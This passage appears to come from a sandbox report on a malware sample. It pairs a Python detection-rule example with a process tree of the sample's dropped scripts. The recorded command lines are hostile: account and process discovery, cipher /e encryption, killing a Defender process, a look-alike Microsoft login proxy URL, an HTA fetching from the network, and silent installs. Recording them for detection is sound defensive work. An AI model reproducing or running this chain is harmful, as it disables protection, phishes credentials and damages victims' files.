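The signatures above (Runs net.exe, Runs ping.exe, Kills process with taskkill, Views/modifies file attributes) are per-process counters; the command lines behind them appear in the process tree that follows: one script (doxx.cmd) runs ipconfig, net accounts, net user and tasklist back to back, cipher.cmd runs cipher /e four times, taskkill is pointed at WindowsDefender.exe, and Edge is launched on http://https-login--microsoftonline--com.httpsproxy.net/... . The following is an added example (not code from this report or from any tool it names) of the hunting rules a practitioner would write over such events: a discovery burst from one script, EFS encryption driven from a script, a kill aimed at a Defender-named image, and a browser launch on a proxied look-alike hostname. EVENTS is transcribed from the tree (pid, parent pid, image, command line); the field layout and ordering are this example's own, the long ?ctx= token is shortened to "x", the WATCHED domain list is an assumption, and the reading of the hostname as login.microsoftonline.com behind httpsproxy.net is this example's interpretation, not a statement in the report.

```python
"""Hunting rules over process-creation events shaped like this report's tree.

Added example; not code from the sandbox report or from any tool it names.
EVENTS is transcribed from the report's process tree; field layout, ordering
and the shortened ?ctx=x token are this example's own.
"""
from collections import defaultdict
from urllib.parse import urlsplit

EVENTS = [  # (pid, parent pid, image, command line)
    (1188, 2192, "cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\!main.cmd" "'),
    (1960, 1188, "cmd.exe", r"C:\Windows\system32\cmd.exe /K doxx.cmd"),
    (3304, 1960, "ipconfig.exe", "ipconfig"),
    (4544, 1960, "net.exe", "net accounts"),
    (1940, 1960, "net.exe", "net user"),
    (1000, 1960, "tasklist.exe", "tasklist /apps /v /fo table"),
    (640, 1188, "PING.EXE", "ping google.com -t -n 1 -s 4 -4"),
    (2856, 1188, "taskkill.exe", "taskkill /f /im WindowsDefender.exe"),
    (2316, 1188, "msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument '
     "http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=x"),
    (4784, 1188, "cmd.exe", r"C:\Windows\system32\cmd.exe /K cipher.cmd"),
    (1740, 4784, "cipher.exe", "cipher /e"),
    (1364, 4784, "cipher.exe", "cipher /e"),
]

DISCOVERY = {"ipconfig.exe", "net.exe", "tasklist.exe", "whoami.exe",
             "systeminfo.exe", "nltest.exe"}
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe"}
WATCHED = ("microsoftonline.com", "microsoft.com", "office.com", "live.com")  # assumed


def decode_lookalike(host):
    """('login.microsoftonline.com', 'httpsproxy.net') for the report's host,
    None otherwise. Interpretation used here: the first DNS label spells the
    spoofed host with '.' written as '--' behind an optional http(s)- prefix,
    and the remaining labels are the proxy's own domain."""
    first, _, proxy = host.lower().partition(".")
    if "--" not in first or not proxy:
        return None
    if first.startswith(("https-", "http-")):
        first = first.split("-", 1)[1]
    spoofed = first.replace("--", ".")
    if any(spoofed == w or spoofed.endswith("." + w) for w in WATCHED):
        return spoofed, proxy
    return None


def analyse(events):
    """Return (rule, pid, detail) findings in event order."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev[1]].append(ev)
    findings = []
    for pid, _ppid, image, cmd in events:
        image, words = image.lower(), cmd.split()
        kids = by_parent[pid]
        if image == "cmd.exe":
            # one script spawning several discovery LOLBins
            hits = sorted({k[2].lower() for k in kids} & DISCOVERY)
            if len(hits) >= 3:
                findings.append(("discovery-burst", pid, ", ".join(hits)))
            # cipher /e enables EFS on the files in the current directory
            if any(k[2].lower() == "cipher.exe" and "/e" in k[3].lower().split()
                   for k in kids):
                findings.append(("efs-encrypt-from-script", pid, cmd))
        elif image == "taskkill.exe":
            lw = [w.lower() for w in words]
            if "/im" in lw and lw.index("/im") + 1 < len(words):
                target = words[lw.index("/im") + 1]
                if "defender" in target.lower():
                    findings.append(("av-kill-attempt", pid, target))
        elif image in BROWSERS:
            for w in words:
                if w.startswith(("http://", "https://")):
                    hit = decode_lookalike(urlsplit(w).hostname or "")
                    if hit:
                        findings.append(("lookalike-login-url", pid,
                                         f"{hit[0]} via {hit[1]}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyse(EVENTS):
        print(f"{rule:24} pid={pid:<5} {detail}")
```

The discovery rule keys on the parent, not on the individual net.exe or ipconfig.exe launches, because each of those is routine on its own; it is the same script spawning three or more of them that is worth an alert.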
Processes
-
1⤵ C:\Users\Admin\AppData\Local\Temp\vir.exe
   "C:\Users\Admin\AppData\Local\Temp\vir.exe"
   - Checks computer location settings
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory
   PID:2192
  2⤵ C:\Users\Admin\AppData\Local\Temp\e267a0a2-2082-40ab-bb32-812dc8ebdae1\ProgressBarSplash.exe
     "C:\Users\Admin\AppData\Local\Temp\e267a0a2-2082-40ab-bb32-812dc8ebdae1\ProgressBarSplash.exe" -unpacking
     - Executes dropped EXE
     - System Location Discovery: System Language Discovery
     PID:1568
  2⤵ C:\Windows\SysWOW64\cmd.exe
     C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\!main.cmd" "
     - Checks computer location settings
     - System Location Discovery: System Language Discovery
     - Modifies registry class
     - Suspicious use of WriteProcessMemory
     PID:1188
    3⤵ C:\Windows\SysWOW64\cmd.exe
       C:\Windows\system32\cmd.exe /K spread.cmd
       - System Location Discovery: System Language Discovery
       - Suspicious use of WriteProcessMemory
       PID:4224
      4⤵ C:\Windows\SysWOW64\xcopy.exe
         xcopy 1 C:\Users\Admin\Desktop
         - System Location Discovery: System Language Discovery
         - Enumerates system info in registry
         PID:3044
      4⤵ C:\Windows\SysWOW64\xcopy.exe
         xcopy 2 C:\Users\Admin\Desktop
         - System Location Discovery: System Language Discovery
         - Enumerates system info in registry
         PID:4440
      4⤵ C:\Windows\SysWOW64\xcopy.exe
         xcopy 3 C:\Users\Admin\
         - System Location Discovery: System Language Discovery
         - Enumerates system info in registry
         PID:1716
    3⤵ C:\Windows\SysWOW64\cmd.exe
       C:\Windows\system32\cmd.exe /K doxx.cmd
       - System Location Discovery: System Language Discovery
       - Suspicious use of WriteProcessMemory
       PID:1960
      4⤵ C:\Windows\SysWOW64\ipconfig.exe
         ipconfig
         - System Location Discovery: System Language Discovery
         - Gathers network information
         PID:3304
      4⤵ C:\Windows\SysWOW64\net.exe
         net accounts
         - System Location Discovery: System Language Discovery
         - Suspicious use of WriteProcessMemory
         PID:4544
        5⤵ C:\Windows\SysWOW64\net1.exe
           C:\Windows\system32\net1 accounts
           - System Location Discovery: System Language Discovery
           PID:3724
      4⤵ C:\Windows\SysWOW64\net.exe
         net user
         - Suspicious use of WriteProcessMemory
         PID:1940
        5⤵ C:\Windows\SysWOW64\net1.exe
           C:\Windows\system32\net1 user
           - System Location Discovery: System Language Discovery
           PID:3732
      4⤵ C:\Windows\SysWOW64\tasklist.exe
         tasklist /apps /v /fo table
         - Enumerates processes with tasklist
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID:1000
    3⤵ C:\Windows\SysWOW64\PING.EXE
       ping google.com -t -n 1 -s 4 -4
       - System Location Discovery: System Language Discovery
       - System Network Configuration Discovery: Internet Connection Discovery
       - Runs ping.exe
       PID:640
    3⤵ C:\Windows\SysWOW64\taskkill.exe
       taskkill /f /im WindowsDefender.exe
       - System Location Discovery: System Language Discovery
       - Kills process with taskkill
       - Suspicious use of AdjustPrivilegeToken
       PID:2856
    3⤵ C:\Windows\SysWOW64\cmd.exe
       C:\Windows\system32\cmd.exe /K handler.cmd
       - System Location Discovery: System Language Discovery
       PID:384
    3⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
       "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
       - Manipulates Digital Signatures
       - Enumerates system info in registry
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
       - Suspicious use of FindShellTrayWindow
       - Suspicious use of SendNotifyMessage
       - Suspicious use of WriteProcessMemory
       PID:2316
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe30594718
         PID:3896
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
         PID:4268
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
         - Suspicious behavior: EnumeratesProcesses
         PID:1768
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
         PID:3884
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
         PID:856
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
         PID:2992
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:1
         PID:6088
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
         PID:5800
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
         PID:2508
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
         PID:5640
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
         PID:5312
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:8
         PID:4156
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 /prefetch:8
         - Suspicious behavior: EnumeratesProcesses
         PID:1076
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1920 /prefetch:2
         PID:8672
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
         PID:5664
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
         PID:4196
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
         PID:8328
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2304 /prefetch:1
         PID:8724
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
         PID:8428
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
         PID:8516
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
         PID:6072
      4⤵ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
         "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4505049330367394993,4121852246040805420,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
         PID:2456
[3] C:\Windows\SysWOW64\cmd.exe  |  C:\Windows\system32\cmd.exe /K cipher.cmd  |  PID 4784
    - System Location Discovery: System Language Discovery
  [4] C:\Windows\SysWOW64\cipher.exe  |  cipher /e  |  PID 1740
      - System Location Discovery: System Language Discovery
  [4] C:\Windows\SysWOW64\cipher.exe  |  cipher /e  |  PID 1364
      - System Location Discovery: System Language Discovery
  [4] C:\Windows\SysWOW64\cipher.exe  |  cipher /e  |  PID 5460
      - System Location Discovery: System Language Discovery
  [4] C:\Windows\SysWOW64\cipher.exe  |  cipher /e  |  PID 3544
      - System Location Discovery: System Language Discovery
[3] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\Rover.exe  |  Rover.exe  |  PID 2748
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
[3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  |  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\web.htm  |  PID 4012
    - Suspicious use of WriteProcessMemory
  [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  |  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffe305946f8,0x7ffe30594708,0x7ffe30594718  |  PID 4612
  [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  |  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,8690202403079511743,16040498607515817245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3  |  PID 5796
      - Suspicious behavior: EnumeratesProcesses
[3] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\Google.exe  |  Google.exe  |  PID 1052
    - Executes dropped EXE
[3] C:\Windows\SysWOW64\WScript.exe  |  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\helper.vbs"  |  PID 5968
    - System Location Discovery: System Language Discovery
[3] C:\Windows\SysWOW64\PING.EXE  |  ping google.com -t -n 1 -s 4 -4  |  PID 6096
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
[3] C:\Windows\SysWOW64\PING.EXE  |  ping mrbeast.codes -t -n 1 -s 4 -4  |  PID 5460
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
[3] C:\Windows\SysWOW64\xcopy.exe  |  xcopy Google.exe C:\Users\Admin\Desktop  |  PID 5648
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
[3] C:\Windows\SysWOW64\xcopy.exe  |  xcopy Rover.exe C:\Users\Admin\Desktop  |  PID 5500
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
[3] C:\Windows\SysWOW64\xcopy.exe  |  xcopy spinner.gif C:\Users\Admin\Desktop  |  PID 5380
    - Enumerates system info in registry
[3] C:\Windows\SysWOW64\cmd.exe  |  C:\Windows\system32\cmd.exe /K bloatware.cmd  |  PID 2388
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Modifies registry class
  [4] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\1.exe  |  1.exe  |  PID 6092
      - Executes dropped EXE
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
  [4] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\3.exe  |  3.exe  |  PID 4588
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Modifies registry class
      - Suspicious use of SetWindowsHookEx
    [5] C:\Windows\SysWOW64\WerFault.exe  |  C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 1808  |  PID 6200
        - Program crash
  [4] C:\Windows\SysWOW64\mshta.exe  |  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}  |  PID 2680
      - Blocklisted process makes network request
      - System Location Discovery: System Language Discovery
  [4] C:\Windows\SysWOW64\cmd.exe  |  C:\Windows\system32\cmd.exe /K SilentSetup.cmd  |  PID 5628
      - System Location Discovery: System Language Discovery
    [5] C:\Windows\System32\Conhost.exe  |  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  |  PID 6044
    [5] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe  |  WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT  |  PID 1992
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
      [6] C:\Users\Admin\AppData\Local\Temp\is-RGFG2.tmp\WinaeroTweaker-1.40.0.0-setup.tmp  |  "C:\Users\Admin\AppData\Local\Temp\is-RGFG2.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$1036A,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT  |  PID 5440
          - Executes dropped EXE
          - Loads dropped DLL
          - Drops file in Program Files directory
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of FindShellTrayWindow
        [7] C:\Windows\SysWOW64\cmd.exe  |  "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f  |  PID 6152
            - System Location Discovery: System Language Discovery
          [8] C:\Windows\SysWOW64\taskkill.exe  |  taskkill /im winaerotweaker.exe /f  |  PID 6260
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
        [7] C:\Windows\SysWOW64\cmd.exe  |  "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f  |  PID 6184
            - System Location Discovery: System Language Discovery
          [8] C:\Windows\SysWOW64\taskkill.exe  |  taskkill /im winaerotweakerhelper.exe /f  |  PID 6296
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
[3] C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\regmess.exe  |  regmess.exe  |  PID 1928
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
  [4] C:\Windows\SysWOW64\cmd.exe  |  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_51d1c205-c42b-40e5-bf7d-0e1d4ad47b63\regmess.bat" "  |  PID 5440
      - System Location Discovery: System Language Discovery
    [5] C:\Windows\SysWOW64\reg.exe  |  reg import Setup.reg /reg:32  |  PID 6044
    [5] C:\Windows\SysWOW64\reg.exe  |  reg import Console.reg /reg:32  |  PID 5224
        - System Location Discovery: System Language Discovery
    [5] C:\Windows\SysWOW64\reg.exe  |  reg import Desktop.reg /reg:32  |  PID 6024
        - Sets desktop wallpaper using registry
        - System Location Discovery: System Language Discovery
    [5] C:\Windows\SysWOW64\reg.exe  |  reg import International.reg /reg:32  |  PID 4176
        - System Location Discovery: System Language Discovery
    [5] C:\Windows\SysWOW64\reg.exe  |  reg import Fonts.reg /reg:32  |  PID 5960
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
    [5] C:\Windows\SysWOW64\reg.exe  |  reg import Cursors.reg /reg:32  |  PID 1556
        - System Location Discovery: System Language Discovery
[3] C:\Windows\SysWOW64\timeout.exe  |  timeout /t 10  |  PID 3544
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
